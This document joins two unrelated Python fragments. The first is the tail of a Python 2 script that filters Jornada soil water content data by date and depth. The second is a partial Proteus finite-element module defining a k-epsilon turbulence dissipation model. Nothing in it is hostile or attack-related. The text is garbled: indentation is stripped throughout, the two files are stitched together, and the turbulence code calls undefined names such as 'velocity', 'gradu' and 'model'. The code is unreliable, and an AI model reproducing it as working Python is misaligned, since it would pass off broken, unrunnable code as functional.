j_60 = df['swc_60cm']
j_90 = df['swc_90cm']
j_110 = df['swc_110cm']
j_130 = df['swc_130cm']
vals = (date, j_30, j_60, j_90, j_110, j_130)
values.append(vals)
for i in values:
for date, a, b, c, d, e in zip(i[0], i[1], i[2], i[3], i[4], i[5]):
if "." not in [a, b, c, d, e]:
good_dates.append(date)
# good_dates.append(date)
print "good dates {} pixel {}, length {}".format(good_dates, key, len(good_dates))
# turn good dates into a series to delete the repetitions
good_dates = set(good_dates)
# need to test the intersection of all dates with the dates in values
# for i in values:
good_dates = intersect(good_dates, set(values[0][0]))
# gooder_dates = []
# for i, j in zip(values[0], good_dates):
# for day, gday in i, j:
# if day not in j:
print "good dates as a set", good_dates
print "length of set", len(good_dates)
print "length of values", len(values)
for i in values:
g_dates = []
g_a = []
g_b = []
g_c = []
g_d = []
g_e = []
for date, a, b, c, d, e in zip(i[0], i[1], i[2], i[3], i[4], i[5]):
if date in good_dates:
g_dates.append(date)
g_a.append(a)
g_b.append(b)
g_c.append(c)
g_d.append(d)
g_e.append(e)
good_vals.append((g_dates, g_a, g_b, g_c, g_d, g_e))
print "==="
print len(g_dates)
print len(g_a)
print len(g_b)
print len(g_c)
print len(g_d)
print len(g_e)
print "===="
print "good values", len(good_vals)
for i in good_vals:
print "****"
print len(i[0])
print len(i[1])
print len(i[2])
print len(i[3])
print len(i[3])
print len(i[3])
print "***"
# data = {'date': good_vals[0], 'j_30': i[1], 'j_60': i[2], 'j_90': i[3], 'j_110': i[4], 'j_130': i[5]}
# # # good_df = pd.DataFrame(data=data, columns=['date', 'j_30', 'j_60', 'j_90', 'j_110', 'j_130'])
# # # good_dfs.append(good_df)
# else:
# #for date, a, b, c, d, e in zip(i[0], i[1], i[2], i[3], i[4], i[5]):
# # data = {'date': i[0], 'j_30': i[1], 'j_60': i[2], 'j_90': i[3], 'j_110': i[4], 'j_130': i[5]}
# # good_df = pd.DataFrame(data=data, columns=['date', 'j_30', 'j_60', 'j_90', 'j_110', 'j_130'])
# # good_dfs.append(good_df)
# for dt, a, b, c, d, e in zip(i[0], i[1], i[2], i[3], i[4], i[5]):
# g_dates.append(dt)
# g_a.append(a)
# g_b.append(b)
# g_c.append(c)
# g_d.append(d)
# g_e.append(e)
# good_vals.append((g_dates, g_a, g_b, g_c, g_d, g_e))
# print "the good vals", good_vals
# count = 0
# for gtuple in good_vals:
# print "\n {} \n".format(count)
# for dates, a, b, c, d, e in zip(gtuple[0], gtuple[1], gtuple[2], gtuple[3], gtuple[4], gtuple[5]):
# print "lendates", len(dates)
# print "len a", len(a)
# count += 1
# print "The good DFs ", good_dfs
#
# for i in good_dfs:
# print "length of good df is {}".format(len(i))
def parse_data():
""""""
# ====== Jornada =======
# path to the jornada data
path = "/Users/Gabe/Desktop/33_37_ETRM_aoi_project/Jornada_012002_transect_soil_water_content_data/" \
"Jornada_012002_transect_soil_water_content_data.csv" # This version has data that goes up through 2015
df = pd.read_csv(path, header=72) # I have no idea why it works on 72 but whatever.
# print df
relate_dict = {"000": ["C01", "C02"], "001": ["C03", "C04", "C05", "C06", "C07", "C08", "C09"],
"002": ["C10", "C11"],
"003": ["C12", "C13", "C14", "C15", "C16", "C17", "C18", "C19", "C20", "C21"],
"004": ["C22", "C23", "C24", "C25", "C26", "C27", "C28", "C29"],
"005": ["C31", "C32", "C33", "C34", "C35", "C36", "C37", "C38", "C39"],
"006": ["C40", "C41", "C42", "C43", "C44", "C45", "C46", "C47", "C48"],
"007": ["C51", "C52", "C53", "C54", "C55", "C56", "C57"],
"008": ["C58", "C59", "C60", "C61", "C62", "C63", "C64", "C65", "C66"],
"009": ["C67", "C68", "C69", "C70"], "010": ["C71", "C72", "C73", "C74", "C75"],
"011": ["C76", "C77", "C78", "C79", "C80", "C81", "C82", "C83", "C84"],
"012": ["C85", "C86", "C87", "C88", "C89"]}
df_dict = {}
for key, value in relate_dict.iteritems():
loc_list = []
for loc in value:
df_jornada = df[df['location'] == loc]
# print "df jornada for loc {} in pixel {} \n {}".format(loc, key, df_jornada)
loc_list.append(df_jornada)
df_dict[key] = loc_list
print "another look", df_dict['000']
pix_dictionary = formatter(df_dict)
if __name__ == "__main__":
# Before we find the standard error, we need to parse through the original file and remove any missing entries such
# that if data are missing for one location in the Jornada we throw out the missing data and all corresponding data
# in the time series.
parse_data()
# # this outputs a csv of the running avg(depth_average) and standard error of the mean for each pixel.
# find_std_error()
#
# # process the missing data out of the df dicts
# p_000 = pd.merge(df_dict['000'][0], df_dict['000'][1], on='date')
#
# print "p000", p_000
#
# p_000 = p_000[p_000.swc_30cm != "."]
# p_000 = p_000[p_000.swc_60cm != "."]
# p_000 = p_000[p_000.swc_90cm != "."]
# p_000 = p_000[p_000.swc_110cm != "."]
# p_000 = p_000[p_000.swc_130cm != "."]
#
# print "editt"
| |
from __future__ import division
from builtins import range
from past.utils import old_div
import proteus
from proteus.mprans.cDissipation import *
from proteus.mprans.cDissipation2D import *
import numpy as np
from proteus import Profiling as prof
from proteus import cfemIntegrals
from . import cArgumentsDict
"""
NOTES:
Hardwired Numerics include:
lagging all terms from Navier-Stokes, Kappa equations
same solution space for velocity from Navier-Stokes and Dissipation
equations
This can be removed by saving gradient calculations in N-S and lagging
rather than passing degrees of freedom between models
"""
class SubgridError(proteus.SubgridError.SGE_base):
def __init__(self, coefficients, nd):
proteus.SubgridError.SGE_base.__init__(self, coefficients, nd, lag=False)
def initializeElementQuadrature(self, mesh, t, cq):
pass
def updateSubgridErrorHistory(self, initializationPhase=False):
pass
def calculateSubgridError(self, q):
pass
class ShockCapturing(proteus.ShockCapturing.ShockCapturing_base):
def __init__(self, coefficients, nd, shockCapturingFactor=0.25, lag=True, nStepsToDelay=None):
proteus.ShockCapturing.ShockCapturing_base.__init__(self, coefficients, nd, shockCapturingFactor, lag)
self.nStepsToDelay = nStepsToDelay
self.nSteps = 0
if self.lag:
prof.logEvent("Kappa.ShockCapturing: lagging requested but must lag the first step; switching lagging off and delaying")
self.nStepsToDelay = 1
self.lag = False
def initializeElementQuadrature(self, mesh, t, cq):
self.mesh = mesh
self.numDiff = []
self.numDiff_last = []
for ci in range(self.nc):
self.numDiff.append(cq[('numDiff', ci, ci)])
self.numDiff_last.append(cq[('numDiff', ci, ci)])
def updateShockCapturingHistory(self):
self.nSteps += 1
if self.lag:
for ci in range(self.nc):
self.numDiff_last[ci][:] = self.numDiff[ci]
if self.lag == False and self.nStepsToDelay is not None and self.nSteps > self.nStepsToDelay:
prof.logEvent("Dissipation.ShockCapturing: switched to lagged shock capturing")
self.lag = True
self.numDiff_last = []
for ci in range(self.nc):
self.numDiff_last.append(self.numDiff[ci].copy())
prof.logEvent("Dissipation: max numDiff %e" % (proteus.Comm.globalMax(self.numDiff_last[0].max()),))
class NumericalFlux(proteus.NumericalFlux.Advection_DiagonalUpwind_Diffusion_IIPG_exterior):
def __init__(self, vt, getPointwiseBoundaryConditions,
getAdvectiveFluxBoundaryConditions,
getDiffusiveFluxBoundaryConditions):
proteus.NumericalFlux.Advection_DiagonalUpwind_Diffusion_IIPG_exterior.__init__(self, vt, getPointwiseBoundaryConditions,
getAdvectiveFluxBoundaryConditions,
getDiffusiveFluxBoundaryConditions)
class Coefficients(proteus.TransportCoefficients.TC_base):
"""Basic k-epsilon model for incompressible flow from Hutter etal
Chaper 11 or k-omega (Wilcox 1998).
"""
# Solves for just dissipation variable (epsilon, or omega) assuming
# kappa (intensity) computed independently and lagged in time
# \bar{\vec v} = <\vec v> Reynolds-averaged (mean) velocity
# \vec v^{'} = turbulent fluctuation
# assume \vec v = <\vec v> + \vec v^{'}, with <\vec v^{'}> = 0
# Reynolds averaged NS equations
# \deld \bar{\vec v} = 0
# \pd{\bar{\vec v}}{t} + \deld \left(\bar{\vec v} \outer \bar{\vec v}\right)
# -\nu \deld \ten \bar{D} + \frac{1}{\rho}\grad \bar p
# - \frac{1}{rho}\deld \ten{R} = 0
# Reynolds stress term
# \ten R = -\rho <\vec v^{'}\outer \vec v^{'}>
# \frac{1}{\rho}\ten{R} = 2 \nu_t \bar{D} - \frac{2}{3}k\ten{I}
# D_{ij}(\vec v) = \frac{1}{2} \left( \pd{v_i}{x_j} + \pd{v_j}{x_i})
# \ten D \bar{\ten D} = D(<\vec v>), \ten D^{'} = \ten D(\vec v^{'})
# k-epsilon tranport equations
# \pd{k}{t} + \deld (k\bar{\vec v})
# - \deld\left[\left(\frac{\nu_t}{\sigma_k} + \nu\right)\grad k \right]
# - 4\nu_t \Pi_{D} + \epsilon = 0
# \pd{\varepsilon}{t} + \deld (\varepsilon \bar{\vec v})
# - \deld\left[\left(\frac{\nu_t}{\sigma_\varepsilon} + \nu\right)\grad \varepsilon \right]
# - 4c_1 k \Pi_{D} + c_2 \frac{\epsilon^2}{k} = 0
# k -- turbulent kinetic energy = <\vec v^{'}\dot \vec v^{'}>
# \varepsilon -- turbulent dissipation rate = 4 \nu <\Pi_{D^{'}}>
# \nu -- kinematic viscosity (\mu/\rho)
# \nu_t -- turbulent viscosity = c_mu \frac{k^2}{\varepsilon}
# \Pi_{\ten A} = \frac{1}{2}tr(\ten A^2) = 1/2 \ten A\cdot \ten A
# \ten D \cdot \ten D = \frac{1}{4}\left[ (4 u_x^2 + 4 v_y^2 +
# 1/2 (u_y + v_x)^2 \right]
# 4 \Pi_{D} = 2 \frac{1}{4}\left[ (4 u_x^2 + 4 v_y^2 +
# 1/2 (u_y + v_x)^2 \right]
# = \left[ (2 u_x^2 + 2 v_y^2 + (u_y + v_x)^2 \right]
# \sigma_k -- Prandtl number \approx 1
# \sigma_e -- c_{\mu}/c_e
# c_{\mu} = 0.09, c_1 = 0.126, c_2 = 1.92, c_{\varepsilon} = 0.07
# """
from proteus.ctransportCoefficients import kEpsilon_k_3D_Evaluate_sd
from proteus.ctransportCoefficients import kEpsilon_k_2D_Evaluate_sd
def __init__(self,
VOS_model=None, # Solid model
V_model=None, # Fluid model
LS_model=None,
RD_model=None,
kappa_model=None,
ME_model=None,
SED_model=None,
dissipation_model_flag=1, # default K-Epsilon, 2 --> K-Omega 1998, 3 --> K-Omega 1988
c_mu=0.09,
c_1=0.126,
c_2=1.92,
c_e=0.07,
sigma_e=1.29,
rho_0=998.2,
nu_0=1.004e-6,
rho_1=1.205,
nu_1=1.500e-5,
g=[0.0, -9.8],
nd=3,
epsFact=0.01,
useMetrics=0.0,
sc_uref=1.0,
sc_beta=1.0,
default_kappa=1.0e-3,
closure=None,
nullSpace='NoNullSpace',
initialize=True):
self.useMetrics = useMetrics
self.dissipation_model_flag = dissipation_model_flag # default K-Epsilon, 2 ==> K-Omega 1998, 3 --> K-Omega 1988
self.variableNames = ['epsilon']
self.nd = nd
self.rho_0 = rho_0
self.nu_0 = nu_0
self.rho_1 = rho_1
self.rho = rho_0
self.nu_1 = nu_1
self.c_mu = c_mu
self.c_1 = c_1
self.c_2 = c_2
self.c_e = c_e
self.sigma_e = sigma_e
self.g = g
self.epsFact = epsFact
self.flowModelIndex = V_model
self.modelIndex = ME_model
self.RD_modelIndex = RD_model
self.LS_modelIndex = LS_model
self.VOS_modelIndex = VOS_model
self.SED_modelIndex = SED_model
self.kappa_modelIndex = kappa_model
self.sc_uref = sc_uref
self.sc_beta = sc_beta
self.nullSpace = nullSpace
# for debugging model
self.default_kappa = default_kappa
self.closure = closure
if initialize:
self.initialize()
def initialize(self):
if self.dissipation_model_flag >= 2:
self.variableNames = ['omega']
#
nc = 1
mass = {0: {0: 'linear'}}
advection = {0: {0: 'linear'}}
hamiltonian = {}
potential = {0: {0: 'u'}}
diffusion = {0: {0: {0: 'nonlinear', }}}
reaction = {0: {0: 'nonlinear'}}
if self.nd == 2:
sdInfo = {(0, 0): (np.array([0, 1, 2], dtype='i'),
np.array([0, 1], dtype='i'))}
else:
sdInfo = {(0, 0): (np.array([0, 1, 2, 3], dtype='i'),
np.array([0, 1, 2], dtype='i'))}
proteus.TransportCoefficients.TC_base.__init__(self,
nc,
mass,
advection,
diffusion,
potential,
reaction,
hamiltonian,
self.variableNames,
sparseDiffusionTensors=sdInfo)
closure = self.closure
try:
self.aDarcy=closure.aDarcy
self.betaForch=closure.betaForch
self.grain=closure.grain
self.packFraction=closure.packFraction
self.packMargin=closure.packMargin
self.maxFraction=closure.maxFraction
self.frFraction=closure.frFraction
self.sigmaC=closure.sigmaC
self.C3e=closure.C3e
self.C4e=closure.C4e
self.eR=closure.eR
self.fContact=closure.fContact
self.mContact=closure.mContact
self.nContact=closure.nContact
self.angFriction=closure.angFriction
self.vos_limiter = closure.vos_limiter
self.mu_fr_limiter = closure.mu_fr_limiter
self.sedFlag = 1
prof.logEvent("INFO: Loading parameters for sediment closure",2)
except:
self.aDarcy=-1.
self.betaForch=-1.
self.grain=-1.
self.packFraction=-1.
self.packMargin=-1.
self.maxFraction=-1.
self.frFraction=-1.
self.sigmaC=-1.
self.C3e=-1.
self.C4e=-1.
self.eR=-1.
self.fContact=-1.
self.mContact=-1.
self.nContact=-1.
self.angFriction=-1.
self.vos_limiter = -1.
self.mu_fr_limiter = -1.
self.sedFlag=0
assert self.VOS_modelIndex == None
assert self.SED_modelIndex == None
prof.logEvent("Sediment module is off. Loading dummy parameters",2)
def initializeMesh(self, mesh):
self.eps = self.epsFact * mesh.h
def attachModels(self, modelList):
assert self.modelIndex is not None and self.modelIndex < len(
modelList), "Dissipation: invalid index for self model allowed range: [0,%s]" % len(modelList)
# self
self.model = modelList[self.modelIndex]
# redistanced level set
if self.RD_modelIndex is not None:
self.rdModel = modelList[self.RD_modelIndex]
# level set
if self.LS_modelIndex is not None:
self.lsModel = modelList[self.LS_modelIndex]
self.q_phi = modelList[self.LS_modelIndex].q[('u', 0)]
self.ebqe_phi = modelList[self.LS_modelIndex].ebqe[('u', 0)]
if ('u', 0) in modelList[self.LS_modelIndex].ebq:
self.ebq_phi = modelList[self.LS_modelIndex].ebq[('u', 0)]
else:
self.ebq_phi = None
else:
self.q_phi =-np.ones( modelList[self.kappa_modelIndex].q[('u', 0)].shape, 'd')
#self.ebq_phi =-np.ones( modelList[self.dissipation_modelIndex].ebq[('u', 0)].shape, 'd')
self.ebqe_phi = -np.ones( modelList[self.kappa_modelIndex].ebqe[('u', 0)].shape, 'd')
# flow model
self.u_old_dof = np.copy(self.model.u[0].dof)
assert self.flowModelIndex is not None, "Dissipation: invalid index for flow model allowed range: [0,%s]" % len(modelList)
# print "flow model index------------",self.flowModelIndex,modelList[self.flowModelIndex].q.has_key(('velocity',0))
if self.flowModelIndex is not None: # keep for debugging for now
self.model.ebqe['n'][:] = modelList[self.flowModelIndex].ebqe['n']
if ('velocity', 0) in modelList[self.flowModelIndex].q:
self.q_v = modelList[self.flowModelIndex].q[('velocity', 0)]
self.ebqe_v = modelList[self.flowModelIndex].ebqe[('velocity', 0)]
else:
self.q_v = modelList[self.flowModelIndex].q[('f', 0)]
self.ebqe_v = modelList[self.flowModelIndex].ebqe[('f', 0)]
if ('velocity', 0) in modelList[self.flowModelIndex].ebq:
self.ebq_v = modelList[self.flowModelIndex].ebq[('velocity', 0)]
else:
if ('f', 0) in modelList[self.flowModelIndex].ebq:
self.ebq_v = modelList[self.flowModelIndex].ebq[('f', 0)]
#
import copy
self.q_grad_u = modelList[self.flowModelIndex].q[('grad(u)', 1)]
self.q_grad_v = modelList[self.flowModelIndex].q[('grad(u)', 2)]
#
self.ebqe_grad_u = modelList[self.flowModelIndex].ebqe[('grad(u)', 1)]
self.ebqe_grad_v = modelList[self.flowModelIndex].ebqe[('grad(u)', 2)]
if ('grad(u)', 1) in modelList[self.flowModelIndex].ebq:
self.ebq_grad_u = modelList[self.flowModelIndex].ebq[('grad(u)', 1)]
if ('grad(u)', 2) in modelList[self.flowModelIndex].ebq:
self.ebq_grad_v = modelList[self.flowModelIndex].ebq[('grad(u)', 2)]
#
# now allocate the 3D variables
if self.nd == 2:
self.q_grad_w = self.q_grad_v.copy()
self.ebqe_grad_w = self.ebqe_grad_v.copy()
if ('grad(u)', 2) in modelList[self.flowModelIndex].ebq:
self.ebq_grad_w = self.ebq_grad_v.copy()
else:
self.q_grad_w = modelList[self.flowModelIndex].q[('grad(u)', 3)]
self.ebqe_grad_w = modelList[self.flowModelIndex].ebqe[('grad(u)', 3)]
if ('grad(u)', 3) in modelList[self.flowModelIndex].ebq:
self.ebq_grad_w = modelList[self.flowModelIndex].ebq[('grad(u)', 3)]
#
self.velocity_dof_u = modelList[self.flowModelIndex].u[1].dof
self.velocity_dof_v = modelList[self.flowModelIndex].u[2].dof
if self.nd == 2:
self.velocity_dof_w = self.velocity_dof_v.copy()
else:
self.velocity_dof_w = modelList[self.flowModelIndex].u[3].dof
if hasattr(modelList[self.flowModelIndex].coefficients, 'q_porosity'):
self.q_porosity = modelList[self.flowModelIndex].coefficients.q_porosity
else:
self.q_porosity = np.ones(self.q[('u', 0)].shape, 'd')
if hasattr(modelList[self.flowModelIndex].coefficients, 'ebqe_porosity'):
self.ebqe_porosity = modelList[self.flowModelIndex].coefficients.ebqe_porosity
else:
self.ebqe_porosity = np.ones( modelList[self.flowModelIndex].ebqe[('velocity', 0)].shape, 'd')
else:
self.velocity_dof_u = np.zeros(self.model.u[0].dof.shape, 'd')
self.velocity_dof_v = np.zeros(self.model.u[0].dof.shape, 'd')
if self.nd == 2:
self.velocity_dof_w = self.velocity_dof_v.copy()
else:
self.velocity_dof_w = np.zeros(self.model.u[0].dof.shape, 'd')
self.q_porosity = np.ones(self.q[('u', 0)].shape, 'd')
self.ebqe_porosity = np.ones(self.ebqe[('u', 0)].shape, 'd')
#
#assert self.kappa_modelIndex is not None and self.kappa_modelIndex < len(modelList), "Dissipation: invalid index for dissipation model allowed range: [0,%s]" % len(modelList)
if self.kappa_modelIndex is not None: # keep for debugging for now
# assume have q,ebqe always
self.q_kappa = modelList[self.kappa_modelIndex].q[('u', 0)]
self.ebqe_kappa = modelList[self.kappa_modelIndex].ebqe[('u', 0)]
self.q_grad_kappa = modelList[self.kappa_modelIndex].q[('grad(u)', 0)]
if ('u', 0) in modelList[self.kappa_modelIndex].ebq:
self.ebq_kappa = modelList[self.kappa_modelIndex].ebq[('u', 0)]
else:
self.q_kappa = np.zeros(self.model.q[('u', 0)].shape, 'd')
self.q_kappa.fill(self.default_kappa)
self.ebqe_kappa = np.zeros(self.model.ebqe[('u', 0)].shape, 'd')
self.ebqe_kappa.fill(self.default_kappa)
self.q_grad_kappa = np.zeros(self.model.q[('grad(u)', 0)].shape, 'd')
if ('u', 0) in self.model.ebq:
self.ebq_kappa = np.zeros(self.model.ebq[('u', 0)].shape, 'd')
self.ebq_kappa.fill(self.default_kappa)
#
if self.VOS_modelIndex is not None:
self.vosModel = model[self.VOS_modelIndex ]
self.q_vos = modelList[self.VOS_modelIndex].q[('u', 0)]
self.grad_vos = modelList[self.VOS_modelIndex].q[('grad(u)', 0)]
self.ebqe_vos = modelList[self.VOS_modelIndex].ebqe[('u', 0)]
self.ebqe_grad_vos = modelList[self.VOS_modelIndex].ebqe[('grad(u)', 0)]
else:
self.q_vos = self.model.q[('u', 0)]
self.grad_vos = self.model.q[('u', 0)]
self.ebqe_vos = self.model.ebqe[('u', 0)]
self.ebqe_grad_vos = self.model.ebqe[('u', 0)]
if self.SED_modelIndex is not None:
self.rho_s=modelList[self.SED_modelIndex].coefficients.rho_s
self.vs=modelList[self.SED_modelIndex].q[('u', 0)]
self.ebqe_vs=modelList[self.SED_modelIndex].ebqe[('u', 0)]
else:
self.rho_s=self.rho_0
self.vs=self.q_v
self.ebqe_vs=self.ebqe_v
#
def initializeElementQuadrature(self, t, cq):
if self.flowModelIndex is None:
self.q_v = np.ones(cq[('f', 0)].shape, 'd')
self.q_grad_u = np.ones(cq[('grad(u)', 0)].shape, 'd')
self.q_grad_v = np.ones(cq[('grad(u)', 0)].shape, 'd')
if self.nd == 2:
self.q_grad_w = self.q_grad_v.copy()
else:
self.q_grad_w = np.ones(cq[('grad(u)', 0)].shape, 'd')
if self.kappa_modelIndex is None:
self.q_kappa = np.ones(cq[('u', 0)].shape, 'd')
self.q_kappa.fill(self.default_kappa)
self.q_grad_kappa = np.zeros(cq[('grad(u)', 0)].shape, 'd')
def initializeElementBoundaryQuadrature(self, t, cebq, cebq_global):
if self.flowModelIndex is None:
self.ebq_v = np.ones(cebq[('f', 0)].shape, 'd')
self.ebq_grad_u = np.ones(cebq[('grad(u)', 0)].shape, 'd')
self.ebq_grad_v = np.ones(cebq[('grad(u)', 0)].shape, 'd')
if self.nd == 2:
self.ebq_grad_w = self.ebq_grad_v.copy()
else:
self.ebq_grad_w = np.ones(cebq[('grad(u)', 0)].shape, 'd')
if self.kappa_modelIndex is None:
self.ebq_kappa = np.ones(cebq[('u', 0)].shape, 'd')
self.ebq_kappa.fill(self.default_kappa)
def initializeGlobalExteriorElementBoundaryQuadrature(self, t, cebqe):
if self.flowModelIndex is None:
self.ebqe_v = np.ones(cebqe[('f', 0)].shape, 'd')
self.ebqe_grad_u = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
self.ebqe_grad_v = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
self.ebqe_grad_w = np.ones(cebqe[('grad(u)', 0)].shape, 'd')
if self.kappa_modelIndex is None:
self.ebqe_kappa = np.ones(cebqe[('u', 0)].shape, 'd')
self.ebqe_kappa.fill(self.default_kappa)
def preStep(self, t, firstStep=False):
copyInstructions = {}
return copyInstructions
def postStep(self, t, firstStep=False):
self.u_old_dof = np.copy(self.model.u[0].dof)
for eN in range(self.model.q[('u',0)].shape[0]):
for k in range(self.model.q[('u',0)].shape[1]):
self.model.q[('u',0)][eN,k] = max( self.model.q[('u',0)][eN,k], 1e-10)
if ('u', 0) in self.model.ebq:
for eN in range(self.model.ebq[('u',0)].shape[0]):
for k in range(self.model.ebq[('u',0)].shape[1]):
for l in range(len(self.model.ebq[('u',0)][eN,k])):
self.model.ebq[('u',0)][eN,k,l] = max( self.model.ebq[('u',0)][eN,k,l], 1e-10)
for eN in range(self.model.ebqe[('u',0)].shape[0]):
for k in range(self.model.ebqe[('u',0)].shape[1]):
self.model.ebqe[('u',0)][eN,k] = max( self.model.ebqe[('u',0)][eN,k], 1e-10)
copyInstructions = {}
return copyInstructions
def updateToMovingDomain(self, t, c):
# in a moving domain simulation the velocity coming in is already for the moving domain
pass
def evaluate(self, t, c):
# mwf debug
# print "Dissipationcoeficients eval t=%s " % t
if c[('f', 0)].shape == self.q_v.shape:
v = self.q_v
phi = self.q_phi
grad_u = self.q_grad_u
grad_v = self.q_grad_v
grad_w = self.q_grad_w
kappa = self.q_kappa
elif c[('f', 0)].shape == self.ebqe_v.shape:
v = self.ebqe_v
phi = self.ebqe_phi
grad_u = self.ebqe_grad_u
grad_v = self.ebqe_grad_v
grad_w = self.ebqe_grad_w
kappa = self.ebqe_kappa
elif ((self.ebq_v is not None and self.ebq_phi is not None and self.ebq_grad_u is not None and self.ebq_grad_v is not None and self.ebq_grad_w is not None and self.ebq_kappa is not None) and c[('f', 0)].shape == self.ebq_v.shape):
v = self.ebq_v
phi = self.ebq_phi
grad_u = self.ebq_grad_u
grad_v = self.ebq_grad_v
grad_w = self.ebqe_grad_w
kappa = self.ebq_kappa
else:
v = None
phi = None
grad_u = None
grad_v = None
grad_w = None
if v is not None:
if self.nd == 2:
self.kEpsilon_epsilon_2D_Evaluate_sd(self.sigma_e,
self.c_1,
self.c_2,
self.c_mu,
self.c_e,
self.nu,
velocity,
gradu,
gradv,
c[('u', 0)],
kappa,
c[('m', 0)],
c[('dm', 0, 0)],
c[('f', 0)],
c[('df', 0, 0)],
c[('a', 0, 0)],
c[('da', 0, 0, 0)],
c[('r', 0)],
c[('dr', 0, 0)])
else:
self.kEpsilon_epsilon_3D_Evaluate_sd(self.sigma_e,
self.c_1,
self.c_2,
self.c_mu,
self.c_e,
self.nu,
velocity,
gradu,
gradv,
gradw,
c[('u', 0)],
kappa,
c[('m', 0)],
c[('dm', 0, 0)],
c[('f', 0)],
c[('df', 0, 0)],
c[('a', 0, 0)],
c[('da', 0, 0, 0)],
c[('r', 0)],
c[('dr', 0, 0)])
class LevelModel(proteus.Transport.OneLevelTransport):
nCalls = 0
def __init__(self,
uDict,
phiDict,
testSpaceDict,
matType,
dofBoundaryConditionsDict,
dofBoundaryConditionsSetterDict,
coefficients,
elementQuadrature,
elementBoundaryQuadrature,
fluxBoundaryConditionsDict=None,
advectiveFluxBoundaryConditionsSetterDict=None,
diffusiveFluxBoundaryConditionsSetterDictDict=None,
stressTraceBoundaryConditionsSetterDict=None,
stabilization=None,
shockCapturing=None,
conservativeFluxDict=None,
numericalFluxType=None,
TimeIntegrationClass=None,
massLumping=False,
reactionLumping=False,
options=None,
name='defaultName',
reuse_trial_and_test_quadrature=True,
sd = True,
movingDomain=False,
bdyNullSpace=False):
#
# set the objects describing the method and boundary conditions
#
self.bdyNullSpace=bdyNullSpace
self.movingDomain=movingDomain
self.tLast_mesh=None
#
self.name = name
self.sd = sd
self.Hess = False
self.lowmem = True
self.timeTerm = True # allow turning off the time derivative
# self.lowmem=False
self.testIsTrial = True
self.phiTrialIsTrial = True
self.u = uDict
self.ua = {} # analytical solutions
self.phi = phiDict
self.dphi = {}
self.matType = matType
# try to reuse test and trial information across components if spaces are the same
self.reuse_test_trial_quadrature = reuse_trial_and_test_quadrature # True#False
if self.reuse_test_trial_quadrature:
for ci in range(1, coefficients.nc):
assert self.u[ci].femSpace.__class__.__name__ == self.u[0].femSpace.__class__.__name__, "to reuse_test_trial_quad all femSpaces must be the same!"
# Simplicial Mesh
self.mesh = self.u[0].femSpace.mesh # assume the same mesh for all components for now
self.testSpace = testSpaceDict
self.dirichletConditions = dofBoundaryConditionsDict
self.dirichletNodeSetList = None # explicit Dirichlet conditions for now, no Dirichlet BC constraints
self.coefficients = coefficients
self.coefficients.initializeMesh(self.mesh)
self.nc = self.coefficients.nc
self.stabilization = stabilization
self.shockCapturing = shockCapturing
self.conservativeFlux = conservativeFluxDict # no velocity post-processing for now
self.fluxBoundaryConditions = fluxBoundaryConditionsDict
self.advectiveFluxBoundaryConditionsSetterDict = advectiveFluxBoundaryConditionsSetterDict
self.diffusiveFluxBoundaryConditionsSetterDictDict = diffusiveFluxBoundaryConditionsSetterDictDict
# determine whether the stabilization term is nonlinear
self.stabilizationIsNonlinear = False
# cek come back
if self.stabilization is not None:
for ci in range(self.nc):
if ci in coefficients.mass:
for flag in list(coefficients.mass[ci].values()):
if flag == 'nonlinear':
self.stabilizationIsNonlinear = True
if ci in coefficients.advection:
for flag in list(coefficients.advection[ci].values()):
if flag == 'nonlinear':
self.stabilizationIsNonlinear = True
if ci in coefficients.diffusion:
for diffusionDict in list(coefficients.diffusion[ci].values()):
for flag in list(diffusionDict.values()):
if flag != 'constant':
self.stabilizationIsNonlinear = True
if ci in coefficients.potential:
for flag in list(coefficients.potential[ci].values()):
if flag == 'nonlinear':
self.stabilizationIsNonlinear = True
if ci in coefficients.reaction:
for flag in list(coefficients.reaction[ci].values()):
if flag == 'nonlinear':
self.stabilizationIsNonlinear = True
if ci in coefficients.hamiltonian:
for flag in list(coefficients.hamiltonian[ci].values()):
if flag == 'nonlinear':
self.stabilizationIsNonlinear = True
# determine if we need element boundary storage
self.elementBoundaryIntegrals = {}
for ci in range(self.nc):
self.elementBoundaryIntegrals[ci] = ((self.conservativeFlux is not None) or
(numericalFluxType is not None) or
(self.fluxBoundaryConditions[ci] == 'outFlow') or
(self.fluxBoundaryConditions[ci] == 'mixedFlow') or
(self.fluxBoundaryConditions[ci] == 'setFlow'))
#
# calculate some dimensions
#
self.nSpace_global = self.u[0].femSpace.nSpace_global # assume same space dim for all variables
self.nDOF_trial_element = [u_j.femSpace.max_nDOF_element for u_j in list(self.u.values())]
self.nDOF_phi_trial_element = [phi_k.femSpace.max_nDOF_element for phi_k in list(self.phi.values())]
self.n_phi_ip_element = [phi_k.femSpace.referenceFiniteElement.interpolationConditions.nQuadraturePoints for phi_k in list(self.phi.values())]
self.nDOF_test_element = [femSpace.max_nDOF_element for femSpace in list(self.testSpace.values())]
self.nFreeDOF_global = [dc.nFreeDOF_global for dc in list(self.dirichletConditions.values())]
self.nVDOF_element = sum(self.nDOF_trial_element)
self.nFreeVDOF_global = sum(self.nFreeDOF_global)
#
proteus.NonlinearSolvers.NonlinearEquation.__init__(self, self.nFreeVDOF_global)
#
# build the quadrature point dictionaries from the input (this
# is just for convenience so that the input doesn't have to be
# complete)
#
elementQuadratureDict = {}
elemQuadIsDict = isinstance(elementQuadrature, dict)
if elemQuadIsDict: # set terms manually
for I in self.coefficients.elementIntegralKeys:
if I in elementQuadrature:
elementQuadratureDict[I] = elementQuadrature[I]
else:
elementQuadratureDict[I] = elementQuadrature['default']
else:
for I in self.coefficients.elementIntegralKeys:
elementQuadratureDict[I] = elementQuadrature
if self.stabilization is not None:
for I in self.coefficients.elementIntegralKeys:
if elemQuadIsDict:
if I in elementQuadrature:
elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature[I]
else:
elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature['default']
else:
elementQuadratureDict[('stab',) + I[1:]] = elementQuadrature
if self.shockCapturing is not None:
for ci in self.shockCapturing.components:
if elemQuadIsDict:
if ('numDiff', ci, ci) in elementQuadrature:
elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature[('numDiff', ci, ci)]
else:
elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature['default']
else:
elementQuadratureDict[('numDiff', ci, ci)] = elementQuadrature
if massLumping:
for ci in list(self.coefficients.mass.keys()):
elementQuadratureDict[('m', ci)] = Quadrature.SimplexLobattoQuadrature(self.nSpace_global, 1)
for I in self.coefficients.elementIntegralKeys:
